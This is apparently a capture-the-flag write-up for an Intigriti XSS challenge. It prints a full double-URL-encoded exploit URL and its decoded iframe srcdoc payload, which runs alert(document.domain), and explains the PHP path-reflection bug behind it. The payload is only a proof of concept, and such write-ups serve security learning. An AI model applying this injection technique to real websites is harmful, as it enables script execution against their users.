Solution

My solution to Intigriti’s XSS challenge is:

https://challenge.intigriti.io/#../index.php/lolman%25%32%32%25%33%65%25%33%63%25%36%39%25%36%36%25%37%32%25%36%31%25%36%64%25%36%35%25%32%30%25%37%33%25%37%32%25%36%33%25%36%34%25%36%66%25%36%33%25%33%64%25%32%32%25%33%63%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%30%25%37%33%25%37%32%25%36%33%25%33%64%25%32%36%25%32%33%25%37%38%25%33%32%25%33%32%25%33%62%25%32%66%25%36%63%25%36%66%25%36%63%25%32%37%25%33%62%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34%25%32%38%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%25%36%65%25%37%34%25%32%65%25%36%34%25%36%66%25%36%64%25%36%31%25%36%39%25%36%65%25%32%39%25%33%62%25%32%64%25%32%37%25%32%36%25%32%33%25%37%38%25%33%32%25%33%32%25%33%62%25%33%65%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%32%32%25%33%65/diceme

The decoded payload after the fragment looks something like this:

#../index.php/lolman"><iframe srcdoc="<script src=&#x22;/lol';alert(document.domain);-'&#x22;></script>">/diceme

One interesting thing to note is that most people used the reflection in the 403 page when files starting with .ht were blocked whereas I used the reflection from the PHP’s weird path handling.

As per the norm, the requests to /index.php and /index.php/anything/random are both routed to /index.php but a request to /index.php/haxed/me ended up reflecting haxed in one of the link tags in the response. The backend probably used PHP’s basename($_SERVER['SELF']) to output the link tags, leading to the issue.

Overall, the challenge was pretty unique and I applaud intrigiti for coming up with it.